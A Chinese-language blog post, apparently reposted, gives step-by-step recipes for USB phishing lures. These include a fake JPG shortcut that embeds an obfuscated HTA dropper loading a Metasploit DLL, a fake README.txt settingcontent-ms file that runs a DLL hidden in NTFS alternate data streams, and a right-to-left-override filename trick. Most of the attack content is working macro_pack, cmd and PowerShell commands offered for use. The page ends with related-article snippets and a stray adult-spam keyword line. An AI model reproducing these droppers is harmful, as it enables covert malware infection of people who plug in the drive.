<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    USB 釣魚的幾種方式

    Andrew2020-10-12 16:29:52

    1 引誘目標點開美圖

    當目標點開美圖(惡意LNK快捷方式文件:confidential.jpg.lnk),使目標認為他正在打開圖像(confidential.jpg),HTA dropper 隱藏在快捷方式文件中。LNK將執行HTA,HTA將依次執行并刪除的DLL payload,并且用誘餌圖片替換快捷方式(confidential.jpg)。過程如下:

    利用過程如下:

    1.MSF生成dll payload,這里用TheFatRat快速生成:

    2.用macro_pack生成一個經過混淆的HTA payload,他將會執行并刪除dll

    echo DllMain | macro_pack.exe --template=EMBED_DLL --embed=dll_payload.dll --obfuscate -G payload.hta

    EMBED_DLL模板將創建一個VB代碼,該代碼將加載并刪除“-embed”指定的文件,并用rundll32加載;-G是指生成hta文件

    3.同樣用macro_pack生成另外一個經過混淆的HTA payload,他將完成替換刪除.lnk的功能。當我們將其放置于惡意LNK在同一文件夾下。運行后將替換.lnk,釋放“美圖”

    echo "wuyifan.jpg" | macro_pack.exe -t EMBED_EXE --embed=wuyifan.jpg -o -G pic.hta

    如果你此時雙擊pic.hta,會生成wuyifan.jpg,但是此時pic.hta沒有自刪除

    4.整合上述的兩步形成一個自刪除的HTA文件:打開pic.hta將AutoOpen函數名修改為AutoOpen2

    刪除payload.hta的vb代碼的后兩行(AutoOpen和Close),將pic.hta中的vb代碼(除了最后兩行AutoOpen和Close)復制到payload.hta的vb腳本末尾,后并添加以下代碼:

    AutoOpen2

    現在運行payload.hta將運行dll,生成wuyifan.jpg并自刪除

    5.將payload.hta嵌入到.lnk文件中,我們希望它能用mshta.exe來解析從而觸發payload,如運行一下命令:

    %windir%\system32\cmd.exe /c start "" "mshta" "%CD%\confidential.jpg.lnk"

    當payload構成放在USB中,我們需要知道當前路徑,%cd%將提供當前的路徑名稱

    使用macro_pack生成lnk,這里U盤的盤符為”F:”,運行一下命令生成lnk:

    macro_pack.exe -G G:\confidential.jpg.lnk

    這里主要是為了保證lnk的圖標為JPG圖像的圖標,和imageres.dll中67位索引相對應

    6.將.lnk和payload.hta合并到一起就OK了,運行:

    copy /b F:\wuyifan.jpg.lnk+payload.hta F:\wuyifan.jpg.lnk

    說明:

    當在USB中雙擊wuyifan.jpg.lnk,會觸發payload,加載DLL并隱藏到%TEMP%\Document1.asd中,加載payload的方式為:

    CreateObject("WScript.Shell").Run "%windir%\system32\rundll32.exe %temp%\Document1.asd,<<<DLL_FUNCTION>>>", 0

    在任務管理器中會發現圖片正使用taskmgr或者Sysinternals procexp運行,并且lnk文件被真實的圖片替換,實例中USB文件運行的命令容易被殺軟識別出來

    2 針對”README.txt”文件

    當目標打開README.txt時,實際上運行的是惡意的settingcontent-ms文件,文件結構準遵循XML模式,不能像上述方法與hta文件組合。我們將使用NTFS備用數據流來隱藏和運行dll payload

    此settingcontent-ms文件將執行隱藏在備份數據流(README.txt.settingcontent-ms:R)中的DLL,并將以記事本運行存儲在另一個ADS中的誘餌文本(README.txt.settingcontent-ms:T.txt),相比第一種方式它沒有想.lnk或者.uri那樣的快捷箭頭

    利用過程如下:

    1.構建誘餌文本文件,當目標打開時顯示文本

    echo "Hello World!" > Text.txt

    2. 構建惡意設置的快捷方式文件。使用macro_pack生成settingcontent-ms文件,例如要生成一個README.txt文檔,該文檔的啟動運行calc.exe

    echo 'C:\windows\system32\cmd.exe /c calc.exe' '.' |  macro_pack.exe -G README.txt.settingcontent-ms 

    但是我們真正要啟動的是隱藏在NTFS文件系統備份數據流中的DLL payload和誘餌文件。這里有個問題是setcontent-ms文件默認在“C:\Windows\System32”中打開,這樣我們必須知道USB的盤符,為此使用Powershell的腳本如下:

    %windir%\system32\cmd.exe /c powershell.exe $drive=(Get-WmiObject Win32_Volume -Filter "DriveType='2'").Name;Start-Process "notepad.exe" "$drive\README.txt.settingcontent-ms:T.txt"; Start-Process "control.exe" "$drive\README.txt.settingcontent-ms:R"

    上述命令將調用wmi將盤符賦值給$drive變量;啟動記事本打開誘惑文檔README.txt.settingcontent-ms:T.txt;啟動control.exe打開README.txt.settingcontent-ms:R中的DLL payload,其中DLL也可以同rundll32加載。將上述命令替換剛才生成calc命令,最終的README.txt.settingcontent-ms文件如下:

    3. 創建備用數據流。去報USB已經使用NTFS文件系統格式化,當前USB的盤符為“F:”,創建ADS,README.txt.settingcontent-ms:R 包含DLL:

    type dll_payload.dll > F:\README.txt.settingcontent-ms:R

    READNE.txt.settingcontent-ms:T.txt 包含誘餌文本:

    type Text.txt > F:\README.txt.settingcontent-ms:T.txt

    使用streams命令可以檢查創建的ADS流

    PS:使用macro_pack生成RTLO翻轉運行calc的hta文件,運行:

    echo calc.exe | macro_pack.exe -t CMD -G calc.hta --unicode-rtlo=jpg

    生成的文件名為calcath.jpg,實際上是calc[rtlo]gpj.hta,此方法也適用于其他操作系統,但是打開運行的程序可能不同

    原創:物聯網IOT安全
    原文鏈接:https://mp.weixin.qq.com/s/UAt7iF8KAcTFZjT...

    payloaddll文件
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    一個內網安全攻防的知識倉庫
    滲透技巧總結
    2022-01-28 21:33:52
    聲明以下技巧不應用于非法用途Tips 1. 手動端口探測nmap的-sV可以探測出服務版本,但有些情況下必須手動探測去驗證使用Wireshark獲取響應包未免大材小用,可通過nc簡單判斷eg.對于8001端口,nc連接上去,隨便輸入一個字符串,
    信息搜集:開源情報信息收集、創建企業密碼字典進入內網:基于企業弱賬號漏洞、基于系統漏洞進入、網站應用程序滲透隱匿攻擊:Command and Control、代理內網跨邊界應用:內網跨邊界轉發、內網跨邊界代理穿透、shell反彈等
    本文從 dll 注入技術、msf migrate 模塊剖析、檢測思路等方面展開說明。
    剛好404之前有一篇博客寫過這個漏洞,我在它的參考資料里面找到了github上面提供的poc生成代碼,以及j00sean在twitter上面發的6行代碼,以這兩者為基礎對該漏洞進行分析。
    ISafeBreach Labs安全研究人員發現伊朗攻擊者利用微軟MSHTML遠程代碼執行漏洞通過PowerShell 竊取器惡意軟件來竊取受害者谷歌和instagram憑證信息。
    在過去的2023年里,Malwarebytes Labs的研究人員發現通過惡意廣告實現網絡攻擊的活動數量有所增加,特別是通過搜索引擎投放的針對企業組織的惡意廣告行為。如果要將社工活動包括進來的話,相當于是基于瀏覽器的攻擊活動數量增加了不少。
    在本文中,我們將簡要介紹一下用戶帳戶控制,即UAC。我們還將研究它如何潛在地保護免受惡意軟件的攻擊并忽略UAC提示可能給系統帶來的一些問題。
    Andrew
    暫無描述
      亚洲 欧美 自拍 唯美 另类